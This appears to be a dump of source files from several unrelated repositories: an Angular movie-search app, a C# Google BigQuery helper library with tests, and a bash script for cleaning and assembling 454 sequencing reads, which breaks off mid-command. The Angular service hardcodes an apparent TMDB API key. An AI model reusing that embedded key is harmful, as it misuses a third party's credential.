[ "Markdown", "SQL" ]
8
Markdown
steveJ34/Term_DE1
0f9f8da166b53cf4bfde7239a030924c0e0da0b1
38aa378d801bde2ff34c81a3b3b6162edf029905
refs/heads/master
<file_sep>import { Pipe, PipeTransform } from '@angular/core' @Pipe({ name: 'noimage' }) export class NoimagePipe implements PipeTransform { transform(url: string): string { if (!url) { return 'assets/img/noimage.png' } return url } } <file_sep>import { Component } from '@angular/core' import { PeliculasService } from 'src/app/services/peliculas.service' @Component({ selector: 'app-tarjetas', templateUrl: './tarjetas.component.html', styleUrls: ['./tarjetas.component.css'] }) export class TarjetasComponent { public peliculas: any[] = [] public opcion: string = 'actuales' public loading: boolean = true public parametro: string imagenUrl: string = 'image.tmdb.org/t/p/w300/' constructor(private _ps: PeliculasService) { this._ps.getPeliculas(this.opcion).subscribe((data: any) => { this.peliculas = data.results }) this.esperar() } getPeliculas(opcion: string) { this.loading = true this._ps.getPeliculas(opcion).subscribe((data: any) => { this.peliculas = data.results }) this.esperar() } buscar(parametro: string) { this.loading = true this._ps.buscar(parametro).subscribe((data: any) => { this.peliculas = data.results }) this.esperar() } esperar() { setTimeout(() => { this.loading = false }, 800) } } <file_sep>import { Component } from '@angular/core' import { ActivatedRoute } from '@angular/router' import { PeliculasService } from 'src/app/services/peliculas.service' import { Location } from '@angular/common' @Component({ selector: 'app-pelicula', templateUrl: './pelicula.component.html', styleUrls: ['./pelicula.component.css'] }) export class PeliculaComponent { public pelicula: any = {} public loading: boolean = true public image: boolean = true private id: string constructor(private _ps: PeliculasService, private route: ActivatedRoute, private _location: Location) { this.route.params.subscribe(params => { this.id = params['id'] this._ps.getPelicula(this.id).subscribe((data: any) => { this.pelicula = data if (!data.backdrop_path) { this.image = false } }) this.esperar() }) } regresar() { this._location.back() } esperar() { setTimeout(() => { this.loading = false }, 500) } } <file_sep>import { Injectable } from '@angular/core' import { HttpClient } from '@angular/common/http' import { map } from 'rxjs/operators' @Injectable({ providedIn: 'root' }) export class PeliculasService { private apikey: string = '4fa158e44a3f1a9dd31e58b7f97449c8' private urlMovieDb: string = 'https://api.themoviedb.org/3' constructor(private http: HttpClient) {} getCarteleraActual() { let hoy = new Date() let dosSemanasAtras = new Date(hoy.getTime() - 864000000) dosSemanasAtras = new Date(dosSemanasAtras) let url = `${this.urlMovieDb}/discover/movie?primary_release_date.gte=${ dosSemanasAtras.toISOString().split('T')[0] }&primary_release_date.lte=${hoy.toISOString().split('T')[0]}&api_key=${ this.apikey }&language=es&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } getPopulares() { let url = `${this.urlMovieDb}/discover/movie?sort_by=popularity.desc&api_key=${ this.apikey }&language=es&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } getKidsPopulares() { let url = `${ this.urlMovieDb }/discover/movie?certification_country=US&certification.lte=G&sort_by=popularity.desc&api_key=${ this.apikey }&language=es&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } getPeliculas(categoria: string) { if (categoria === 'actuales') { return this.getCarteleraActual() } else if (categoria === 'populares') { return this.getPopulares() } else if (categoria === 'kids') { return this.getKidsPopulares() } else { return this.getCarteleraActual() } } getPelicula(id: string) { let url = `${this.urlMovieDb}/movie/${id}?api_key=${ this.apikey }&language=es&external_source=freebase_id&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } buscar(parametro: string) { let url = `${this.urlMovieDb}/search/movie?api_key=${ this.apikey }&language=es&query=${parametro}&callback=JSONP_CALLBACK` return this.http.jsonp(url, '').pipe(map(res => res)) } } //https://api.themoviedb.org/3/search/movie?api_key={api_key}&query=Jack+Reacher // https://api.themoviedb.org/3/find/{external_id}?api_key=<<api_key>>&language=en-US&external_source=imdb_id <file_sep>export interface Pelicula { title: string rating: number sinopsis: string genero: string estreno: Date elenco: string[] }
c10f77a2beb07900dd509f395f3fd5f015b4602f
[ "TypeScript" ]
5
TypeScript
norbe1994/peliculas-app
fc4942be15b8c7baf9ee840e828dcbb411454bfe
fb69ed1b6b108bd43378e96e8f4a101ec6d2e9b7
refs/heads/master
<repo_name>M3LiNdRu/BigQuery.Net.Service<file_sep>/CustomBigQuery.Test/UnitTestTable.cs using System; using Microsoft.VisualStudio.TestTools.UnitTesting; using Google.Apis.Bigquery.v2; using Custom.BigQuery.Service; using System.Diagnostics; namespace CustomBigQuery.Test { [TestClass] public class UnitTestTable { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodCreateTable() { BigqueryService bq = auth.getServiceAuthP12(); TableService t = new TableService(bq, "api-project-109606543851"); t.CreateTable(typeof(GsodModel), "test"); Debug.WriteLine("Hello"); Assert.IsNotNull(bq); } } } <file_sep>/CustomBigQuery.Test/UnitTestQuery.cs using Custom.BigQuery.Service; using Google.Apis.Bigquery.v2; using Microsoft.VisualStudio.TestTools.UnitTesting; using Newtonsoft.Json.Linq; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading.Tasks; namespace CustomBigQuery.Test { [TestClass] public class UnitTestQuery { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodQueryJSON() { BigqueryService bq = auth.getServiceAuthP12(); QueryService q = new QueryService(bq, "api-project-109606543851"); JObject json = q.GetData("SELECT station_number, wban_number FROM [publicdata:samples.gsod] LIMIT 10"); Debug.WriteLine(json); Assert.IsNotNull(bq); } [TestMethod] public void TestMethodQueryObject() { BigqueryService bq = auth.getServiceAuthP12(); QueryService q = new QueryService(bq, "api-project-109606543851"); List<GsodModel> obj = q.GetData<GsodModel>("SELECT station_number, wban_number FROM [publicdata:samples.gsod] LIMIT 10"); Debug.WriteLine(obj); Assert.IsNotNull(obj); } } } <file_sep>/Custom.BigQuery.Service/Services/Query.cs using Google.Apis.Bigquery.v2; using Google.Apis.Bigquery.v2.Data; using Newtonsoft.Json.Linq; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class QueryService { private BigqueryService bq; private string projectId; private BigQueryDataSerializer deserializer; public QueryService(BigqueryService service, string projectId) { this.bq = service; this.projectId = projectId; this.deserializer = new BigQueryDataSerializer(); } //TODO: Implement pagination public JObject GetData(string query) { JObject list = new JObject(); JobsResource j = bq.Jobs; QueryRequest qr = new QueryRequest(); qr.Query = query; QueryResponse response = j.Query(qr, projectId).Execute(); if (response.Rows != null) { int cnt = 0; foreach (TableRow row in response.Rows) { int cnt2 = 0; JObject element = new JObject(); foreach (TableCell field in row.F) { element.Add(new JProperty("Camp " + cnt2, field.V)); ++cnt2; } list.Add("Fila " + cnt, element); ++cnt; } } else list.Add("null"); return list; } //TODO: Implement pagination public List<T> GetData<T>(string query) where T : new() { List<T> rows; JobsResource j = bq.Jobs; QueryRequest qr = new QueryRequest(); qr.Query = query; QueryResponse response = j.Query(qr, projectId).Execute(); if (response.JobComplete ?? false) { rows = response.Rows.Select(row => deserializer.Deserialize<T>(row, response.Schema)).ToList(); return rows; } return null; } } } <file_sep>/CustomBigQuery.Test/UnitTestAuth.cs using System; using Microsoft.VisualStudio.TestTools.UnitTesting; using Custom.BigQuery.Service; using Google.Apis.Bigquery.v2; namespace CustomBigQuery.Test { [TestClass] public class UnitTestAuth { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodClientAuth() { BigqueryService bq = auth.getAuth(); Assert.IsNotNull(bq); } [TestMethod] public void TestMethodServiceAuth() { BigqueryService bq = auth.getServiceAuthP12(); Assert.IsNotNull(bq); } } } <file_sep>/CustomBigQuery.Test/GsodModel.cs using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace CustomBigQuery.Test { public class GsodModel { public int station_number { get; set; } public int wban_number { get; set; } public int year { get; set; } } } <file_sep>/Custom.BigQuery.Service/Services/Table.cs using Google.Apis.Bigquery.v2; using Google.Apis.Bigquery.v2.Data; using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class TableService { private BigqueryService bq; private string projectId; private BigQueryDataSerializer serializer; public TableService(BigqueryService service, string projectId) { this.bq = service; this.projectId = projectId; this.serializer = new BigQueryDataSerializer(); } public bool CreateTable(Type type, string datasetId) { Table body = createBody(type, datasetId); TablesResource t = new TablesResource(this.bq); Table response = t.Insert(body, this.projectId, datasetId).Execute(); return body.Equals(response); } /// <summary> /// Replace old table for new table with empty rows /// </summary> /// <param name="s"></param> /// <param name="datasetId"></param> /// <param name="tableId"></param> public bool ReplaceTable(String datasetId, String tableId) { TablesResource t = new TablesResource(this.bq); Table body = t.Get(projectId, datasetId, tableId).Execute(); if (this.DeleteTable(datasetId, tableId) == "") { Table newTable = new Table() { Schema = body.Schema, TableReference = new TableReference() { DatasetId = datasetId, ProjectId = projectId, TableId = body.TableReference.TableId } }; Table aux = t.Insert(newTable, projectId, datasetId).Execute(); return body.Equals(aux); } return false; } public string DeleteTable(String datasetId, String tableId) { TablesResource t = new TablesResource(this.bq); return t.Delete(projectId, datasetId, tableId).Execute(); } private Table createBody(Type t, string datasetId) { Table body = new Table() { Description = t.FullName, FriendlyName = t.Name, Schema = this.serializer.GetSchema(t), TableReference = new TableReference() { DatasetId = datasetId, ProjectId = this.projectId, TableId = t.Name } }; return body; } } } <file_sep>/Custom.BigQuery.Service/BqSerializer.cs using Google.Apis.Bigquery.v2.Data; using System; using System.Collections.Generic; using System.Dynamic; using System.Globalization; using System.Linq; using System.Reflection; using System.Text; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class BigQueryDataSerializer { public T Deserialize<T>(TableRow row, TableSchema schema) where T : new() { T obj = new T(); var props = typeof(T).GetProperties(); using(var e1 = schema.Fields.GetEnumerator()) using(var e2 = row.F.GetEnumerator()) { while(e1.MoveNext() && e2.MoveNext()) { string name = e1.Current.Name; string type = e1.Current.Type; string value = (string)e2.Current.V; var prop = props.Where(x => x.Name.Equals(name)).SingleOrDefault(); if (prop != null) prop.SetValue(obj, Parse(type, value)); } } return obj; } public TableDataInsertAllRequest.RowsData Serialize<T>(T obj) { TableDataInsertAllRequest.RowsData row = new TableDataInsertAllRequest.RowsData() { InsertId = Guid.NewGuid().ToString(), Json = AsDictionary(obj) }; return row; } public TableSchema GetSchema(Type type) { TableSchema schema = new TableSchema() { Fields = new List<TableFieldSchema>() }; var props = type.GetProperties(); foreach (var prop in props) { schema.Fields.Add(new TableFieldSchema() { Description = prop.Name, Name = prop.Name, Type = GetBQType(prop.PropertyType) }); } return schema; } private object Parse(string type, string value) { if (value == null) return null; switch (type) { case "STRING": return value; case "INTEGER": return int.Parse(value, CultureInfo.InvariantCulture); case "FLOAT": return double.Parse(value, CultureInfo.InvariantCulture); case "BOOLEAN": return bool.Parse(value); case "TIMESTAMP": return DateTime.Parse(value); case "RECORD": throw new InvalidOperationException("Deserializer can't need support record type."); default: throw new InvalidOperationException("UNKNOWN TYPE:" + type); } } private string GetBQType(Type t) { if (t.Equals(typeof(int))) return "INTEGER"; else if (t.Equals(typeof(double))) return "FLOAT"; else if (t.Equals(typeof(bool))) return "BOOLEAN"; else if (t.Equals(typeof(DateTime))) return "TIMESTAMP"; else if (t.Equals(typeof(string))) return "STRING"; return "RECORD"; } private IDictionary<string, object> AsDictionary(object source) { return source.GetType().GetProperties().ToDictionary ( propInfo => propInfo.Name, propInfo => propInfo.GetValue(source, null) ); } } } <file_sep>/Custom.BigQuery.Service/Services/Job.cs using Google.Apis.Bigquery.v2; using Google.Apis.Bigquery.v2.Data; using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class JobService { private BigqueryService bq; private string projectId; private BigQueryDataSerializer serializer; public JobService(BigqueryService service, string projectId) { this.bq = service; this.projectId = projectId; this.serializer = new BigQueryDataSerializer(); } public void InsertAll<T>(List<T> data, string datasetId, string tableId) { //Map original object to destiny List<TableDataInsertAllRequest.RowsData> rows = data.Select(x => serializer.Serialize<T>(x)).ToList(); try { TabledataResource t = this.bq.Tabledata; TableDataInsertAllRequest req = new TableDataInsertAllRequest() { Kind = "bigquery#tableDataInsertAllRequest", Rows = rows }; TableDataInsertAllResponse response = t.InsertAll(req, projectId, datasetId, tableId).Execute(); if (response.InsertErrors != null) { } } catch (Exception e) { } } public void InsertPOST() { } } } <file_sep>/Custom.BigQuery.Service/Services/Auth.cs using Google.Apis.Auth.OAuth2; using Google.Apis.Bigquery.v2; using Google.Apis.Services; using Google.Apis.Util.Store; using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Security.Cryptography.X509Certificates; using System.Text; using System.Threading; using System.Threading.Tasks; namespace Custom.BigQuery.Service { public class AuthService { private static string projectId = "api-project-XXXXXXXXXXXX"; private static byte[] jsonSecrets = Custom.BigQuery.Service.Properties.Resources.client_secrets; private static string serviceAccountEmail = "<EMAIL>"; private static string P12password = "<PASSWORD>"; private static byte[] P12Key = Properties.Resources.API_Project_XXXXXXXXXXXX; private static byte[] JSONKey = Properties.Resources.API_Project_XXXXXXXXXXXX; private static string APPLICATION_NAME = "Google-BigQuery-CustomService/v0.1"; public BigqueryService getServiceAuthP12() { try { X509Certificate2 certificate = new X509Certificate2(P12Key, P12password, X509KeyStorageFlags.Exportable); ServiceAccountCredential credential; credential = new ServiceAccountCredential(new ServiceAccountCredential. Initializer(serviceAccountEmail) { Scopes = new[] { BigqueryService.Scope.Bigquery, BigqueryService.Scope.CloudPlatform } }.FromCertificate(certificate)); var service = new BigqueryService(new BaseClientService.Initializer() { HttpClientInitializer = credential, ApplicationName = APPLICATION_NAME }); return service; } catch (Exception e) { String a = e.InnerException.Data.ToString(); return null; } } //TODO: Not Implemented public BigqueryService getServiceAuthJSON() { try { return null; } catch (Exception e) { return null; } } public BigqueryService getAuth() { try { UserCredential credential; using (var stream = new MemoryStream(jsonSecrets)) { GoogleWebAuthorizationBroker.Folder = "Bigquery.Auth.Store"; credential = GoogleWebAuthorizationBroker.AuthorizeAsync( GoogleClientSecrets.Load(stream).Secrets, new[] { BigqueryService.Scope.Bigquery, BigqueryService.Scope.CloudPlatform }, "user", CancellationToken.None, new FileDataStore("Bigquery.Auth.Store") ).Result; } // Create the service. var service = new BigqueryService(new BaseClientService.Initializer() { HttpClientInitializer = credential, ApplicationName = APPLICATION_NAME }); return service; } catch (Exception e) { String a = e.InnerException.Data.ToString(); return null; } } } } <file_sep>/CustomBigQuery.Test/UnitTestJobs.cs using Custom.BigQuery.Service; using Google.Apis.Bigquery.v2; using Microsoft.VisualStudio.TestTools.UnitTesting; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading.Tasks; namespace CustomBigQuery.Test { [TestClass] public class UnitTestJobs { private AuthService auth = new AuthService(); [TestMethod] public void TestMethodInsertAll() { BigqueryService bq = auth.getServiceAuthP12(); JobService job = new JobService(bq, "api-project-109606543851"); List<GsodModel> gsodData = new List<GsodModel>() { new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, new GsodModel() {station_number = 99, wban_number = 120, year = 2015 }, }; job.InsertAll<GsodModel>(gsodData,"prova","test"); Debug.WriteLine("Hola"); Assert.IsNotNull(bq); } } }
0ee2d89134092a67f33d579cb7f99f30b003b65b
[ "C#" ]
10
C#
M3LiNdRu/BigQuery.Net.Service
84fda7f446abe00f2d249d59694e456f3684d2e8
09b8ac2e8f32685002cbb92fcf13460a602e42a7
refs/heads/main
<repo_name>wcast/services<file_sep>/tests/Feature/CnpjTest.php <?php namespace WCast\Services\Tests\Feature; class CnpjTest extends TestCas { /** * A basic test example. * * @return void */ public function testBasicTest() { $this->assertTrue(true); } } <file_sep>/tests/Unit/CnpjTest.php <?php namespace WCast\Services\Tests\Unit; use Tests\TestCase; use WCast\Services\Cnpj; class CnpjTest extends TestCase { /** * A basic test example. * * @return void */ public function testBasicTest() { $consulta = new Cnpj(); $consulta->consultaCNPJ(['cnpj' => '', 'captcha' => '']); $this->assertTrue(true); } } <file_sep>/src/CotacaoMoeda.php <?php namespace WCast\Services; /** * Estudar * https://www.bcb.gov.br/estabilidadefinanceira/cotacoestodas * */ class CotacaoMoeda { public function dolar(){ $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, 'https://ptax.bcb.gov.br/ptax_internet/consultarUltimaCotacaoDolar.do'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); ob_start(); curl_exec($ch); curl_close($ch); $file_contents = ob_get_contents(); ob_end_clean(); $html = explode(' ', strip_tags($file_contents)); return "$".trim($html[340]); } } <file_sep>/src/Correios.php <?php namespace WCast\Services; class Correios { public function calculaFrete($data = []) { $cep = str_replace('-', '', $data['cep_destino']); $url = 'http://ws.correios.com.br/calculador/CalcPrecoPrazo.aspx?'; $query = [ 'sCepOrigem' => getenv('FRETE_CEP_ORIGEM'), 'sCepDestino' => $cep, 'nVlPeso' => 1, 'nVlValorDeclarado' => 100, 'nCdServico' => 40010, 'StrRetorno' => 'xml', 'nIndicaCalculo' => 3 ]; $url .= http_build_query($query); $xml = simplexml_load_file($url, 'SimpleXMLElement', LIBXML_NOCDATA); if ($xml->cServico->Erro == 0) { $retorno['status'] = 200; $retorno['valor'] = $xml->cServico->Valor; $retorno['prazo'] = $xml->cServico->PrazoEntrega; } else { $retorno['status'] = 500; $retorno['erro'] = $xml->cServico->MsgErro; } return $retorno; die; } } <file_sep>/src/Cnpj.php <?php namespace WCast\Services; use Symfony\Component\DomCrawler\Crawler; class Cnpj { public $pasta_cookies = ''; public $cookie_file = ''; public $cookie_content = ''; public $cookie = ''; private $attributes = [ 'NOME EMPRESARIAL' => 'razao_social', 'TÍTULO DO ESTABELECIMENTO (NOME DE FANTASIA)' => 'nome_fantasia', 'CÓDIGO E DESCRIÇÃO DA ATIVIDADE ECONÔMICA PRINCIPAL' => 'cnae_principal', 'CÓDIGO E DESCRIÇÃO DA NATUREZA JURÍDICA' => 'cnaes_secundario', 'LOGRADOURO' => 'logradouro', 'NÚMERO' => 'numero', 'COMPLEMENTO' => 'complemento', 'CEP' => 'cep', 'BAIRRO/DISTRITO' => 'bairro', 'MUNICÍPIO' => 'cidade', 'UF' => 'uf', 'SITUAÇÃO CADASTRAL' => 'situacao_cadastral', 'DATA DA SITUAÇÃO CADASTRAL' => 'situacao_cadastral_data', 'DATA DA SITUAÇÃO ESPECIAL' => 'situacao_especial', 'TELEFONE' => 'telefone', 'ENDEREÇO ELETRÔNICO' => 'email', 'ENTE FEDERATIVO RESPONSÁVEL (EFR)' => 'responsavel', 'DATA DE ABERTURA' => 'data_abertura' ]; public function __construct() { session_start(); $this->pasta_cookies = storage_path('wcast/cookies/'); $this->cookie_file = $this->pasta_cookies . 'cnpj_' . session_id(); if (!file_exists($this->cookie_file)) { $file = fopen($this->cookie_file, 'a+'); fclose($file); chmod($this->cookie_file, 0777); } } public function getCaptcha($id_session = 0) { $this->pasta_cookies = storage_path('wcast/cookies/'); $this->cookie_file = $this->pasta_cookies . 'cnpj_' . session_id(); $ch = curl_init('http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/Cnpjreva_Solicitacao_CS.asp'); curl_setopt($ch, CURLOPT_HTTPHEADER, $this->getHeader()); curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie_file); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); $this->cookie_content = ''; $file = fopen($this->cookie_file, 'r'); while (!feof($file)) { $this->cookie_content .= fread($file, 1024); } fclose($file); $linha = explode("\n", $this->cookie_content); for ($contador = 4; $contador < count($linha) - 1; $contador++) { $explodir = explode(chr(9), $linha[$contador]); $this->cookie .= trim($explodir[count($explodir) - 2]) . "=" . trim($explodir[count($explodir) - 1]) . "; "; } $this->cookie = substr($this->cookie, 0, -2); $ch = curl_init('http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/captcha/gerarCaptcha.asp'); curl_setopt($ch, CURLOPT_HTTPHEADER, $this->getHeader()); curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIE, $this->cookie); curl_setopt($ch, CURLOPT_REFERER, 'http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/Cnpjreva_Solicitacao_CS.asp'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); return 'data:image/png;base64,' . base64_encode($result); } public function getHeader() { return [ 'servicos.receita.fazenda.gov.br', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection: keep-alive', 'Upgrade-Insecure-Requests: 1' ]; } public function consultaCNPJ($post = []) { $this->cookie_content = ''; if (!file_exists($this->cookie_file)) { return false; } else { $file = fopen($this->cookie_file, 'r'); while (!feof($file)) { $this->cookie_content .= fread($file, 1024); } fclose($file); $linha = explode("\n", $this->cookie_content); } for ($contador = 4; $contador < count($linha) - 1; $contador++) { $explodir = explode(chr(9), $linha[$contador]); $this->cookie .= trim($explodir[count($explodir) - 2]) . "=" . trim($explodir[count($explodir) - 1]) . "; "; } $this->cookie = substr($this->cookie, 0, -2); if (!strstr($this->cookie_content, 'flag 1')) { $linha = chr(10) . chr(10) . 'servicos.receita.fazenda.gov.br FALSE / FALSE 0 flag 1' . chr(10); $this->cookie = str_replace(chr(10) . chr(10), $linha, $this->cookie_content); unlink($this->cookie_file); $file = fopen($this->cookie_file, 'w'); fwrite($file, $this->cookie); fclose($file); $this->cookie .= ';flag=1'; } $data = [ 'origem' => 'comprovante', 'cnpj' => $post['cnpj'], 'txtTexto_captcha_serpro_gov_br' => $post['captcha'], 'search_type' => 'cnpj' ]; $data = http_build_query($data, NULL, '&'); $headers = array( 'Host: servicos.receita.fazenda.gov.br', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection: keep-alive', 'Upgrade-Insecure-Requests: 1', 'Accept-encoding: gzip', 'Accept-Charset: utf-8' ); $ch = curl_init('http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/valida.asp'); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIE, $this->cookie); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_ENCODING, 'gzip'); curl_setopt($ch, CURLOPT_MAXREDIRS, 3); curl_setopt($ch, CURLOPT_REFERER, 'http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/Cnpjreva_Solicitacao_CS.asp'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $html = curl_exec($ch); curl_close($ch); return $this->parseCnpj($html); } public function parseCnpj($html = '') { $resultUTF8 = mb_convert_encoding($html, 'utf-8', 'ISO-8859-15'); $result = []; $crawler = new Crawler($resultUTF8); foreach ($crawler->filter('td') as $td) { $td = new Crawler($td); $info = $td->filter('font:nth-child(1)'); if ($info->count() > 0) { $key = utf8_decode(trim(strip_tags(preg_replace('/\s+/', ' ', $info->html())))); $attr = isset($this->attributes[$key]) ? $this->attributes[$key] : null; if ($attr === null) { continue; } $bs = $td->filter('font > b'); foreach ($bs as $b) { $b = new Crawler($b); $str = trim(preg_replace('/\s+/', ' ', $b->html())); $attach = utf8_decode(htmlspecialchars_decode($str)); if ($bs->count() == 1) $result[$attr] = $attach; else $result[$attr][] = $attach; } } } return $result; } public function pega_o_que_interessa($inicio, $fim, $total) { $interesse = str_replace($inicio, '', str_replace(strstr(strstr($total, $inicio), $fim), '', strstr($total, $inicio))); return ($interesse); } } <file_sep>/README.md # API de serviços ## 1 - Consulta CNPJ Receita Federal # WCAST Sistemas ### Dev. <NAME> Site: [WCast Sistemas](https://wcast.com.br).
e3ccef2456278b20192763b8fc751b5d20c01dbd
[ "Markdown", "PHP" ]
6
PHP
wcast/services
50da243132326d268f928fb5c9ee3d3b222f483c
6ebee0d6dad8c9b913ee75b96c4f83ca7bcfd317
refs/heads/master
<file_sep># 454_data_analsyis Back up of scripts used for 454 and sanger data analysis <file_sep>#!/usr/bin/bash -x # requires seq_crumbs # requires SPades files="../mid_MID1.sff ../mid_MID2.sff ../mid_MID3.sff ../mid_MID4.sff ../mid_MID5.sff ../mid_MID6.sff" time=$(date) echo $time > mid1_6_cleaning_data.txt echo "Cleaning of:" >> mid1_6_cleaning_data.txt echo $files >> mid1_6_cleaning_data.txt for file in $files do echo " " echo "working on $file" # extract file name string fastq=".fastq" filename=$(echo $file | grep -oE "mid_MID[0-9]") # extract sff to fastq echo "extracting sff" echo " " >> mid1_6_cleaning_data.txt sff_extract $file > $filename$fastq # trim adapters echo "Trimming adapters..." adapter_trim="_AT" filename_out1=$filename$adapter_trim adapter_array=($(tagcleaner -predict -fastq mid_MID1.fastq | sed -E "1d; s/tag.\t([ATGCN]+)\t.+\t.+/\1\n/")) tagcleaner -tag3 ${adapter_array[0]} -tag5 ${adapter_array[1]} -out_format 3 -out $filename_out1 -fastq $filename$fastq num_nuc_end2=$(sed -n 2~4p $filename$adapter_trim$fastq | tr -d '\n' | wc -m) num_nuc_start2=$(sed -n 2~4p $filename$fastq | tr -d '\n' | wc -m) delta2=$(bc <<< "scale = 2; (1-($num_nuc_end2/$num_nuc_start2))*100") echo "Tags used for $file:" >> mid1_6_cleaning_data.txt echo "-tag3 ${adapter_array[0]}" >> mid1_6_cleaning_data.txt echo "-tag5 ${adapter_array[1]}" >> mid1_6_cleaning_data.txt echo "Percent of nucleotides trimmed as tags/adapters $delta2 %" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt # trim edges left_clip=30 right_clip=20 trim_edge="_TE" echo "Clipping edges..." echo "Left clip: $left_clip" echo "Right clip: $right_clip" filename_out2=$filename$adapter_trim$trim_edge$fastq trim_edges -l $left_clip -r $right_clip -o $filename_out2 $filename_out1$fastq num_nuc_start3=$(sed -n 2~4p $filename_out1$fastq | tr -d '\n' | wc -m) num_nuc_end3=$(sed -n 2~4p $filename_out2 | tr -d '\n' | wc -m) delta3=$(bc <<< "scale = 2; (1-($num_nuc_end3/$num_nuc_start3))*100") echo "Percent of nucleotides trimmed using edge clipping: ~ $delta3 %" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt # filter by blast echo "filtering by blast " vector_trim="_VF" filtered_out_file="_filtered_out_seqs.fastq" filter_id=98 echo "Filtering with $filter_id % id" >> mid1_6_cleaning_data.txt filter_by_blast -b vectors_454.fasta -e $filename$filtered_out_file -s $filter_id -o $filename$adapter_trim$trim_edge$vector_trim$fastq $filename_out2 # Write how much was filtered echo "Filtering by blast stats for: $filename.sff" >> mid1_6_cleaning_data.txt start_num=$(grep -c "^@I" $filename_out2) echo "Starting num of reads: $start_num" >> mid1_6_cleaning_data.txt after_filter=$(grep -c "^@I" $filename$adapter_trim$trim_edge$vector_trim$fastq) echo "After filtering: $after_filter" >> mid1_6_cleaning_data.txt delta=$(bc <<< "scale = 2; $start_num-$after_filter") echo "Num of reads filtered out: $delta" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt # trim by quality echo "Trimming by quality..." quality_thresh=15 quality_clip="_QC" echo "Quality threshold: $quality_thresh" >> mid1_6_cleaning_data.txt filename_out3=$filename$adapter_trim$trim_edge$vector_trim$quality_clip$fastq trim_quality -q $quality_thresh -o $filename_out3 $filename$adapter_trim$trim_edge$vector_trim$fastq num_nuc_start4=$(sed -n 2~4p $filename$adapter_trim$trim_edge$vector_trim$fastq | tr -d '\n' | wc -m) num_nuc_end4=$(sed -n 2~4p $filename_out3 | tr -d '\n' | wc -m) delta4=$(bc <<< "scale = 2; (1-($num_nuc_end4/$num_nuc_start4))*100") echo "Percent of nucleotides trimmed using quality clipping: $delta4 %" >> mid1_6_cleaning_data.txt # assembly with Spades echo "assembling with Spades" out_file="~/Data/mids_all/cleaned_mids/Spades_output_trimmed_careful_" if (("$filename" == "mid_MID6")); then spades.py --trusted-contigs ~/Desktop/Spades_run/trust.fasta -m 10 -t 16 --careful --s1 $filename_out3 -o $out_file$filename else spades.py -m 10 -t 16 --careful --s1 $filename_out3 -o $out_file$filename fi # Pull out assemby info #cd $out_file$filename contigs_file="/home/mgrobelny/Data/mids_all/cleaned_mids/Spades_output_trimmed_careful_$filename/contigs.fasta" contig_stats=$(cat $contigs_file |grep ">" | sed -E 's/>NODE_([0-9]+)_length_([0-9]+)_cov_([0-9]+)/\1\t\2\t\3/') num_contigs=$(cat $contigs_file |grep ">" | sed -E 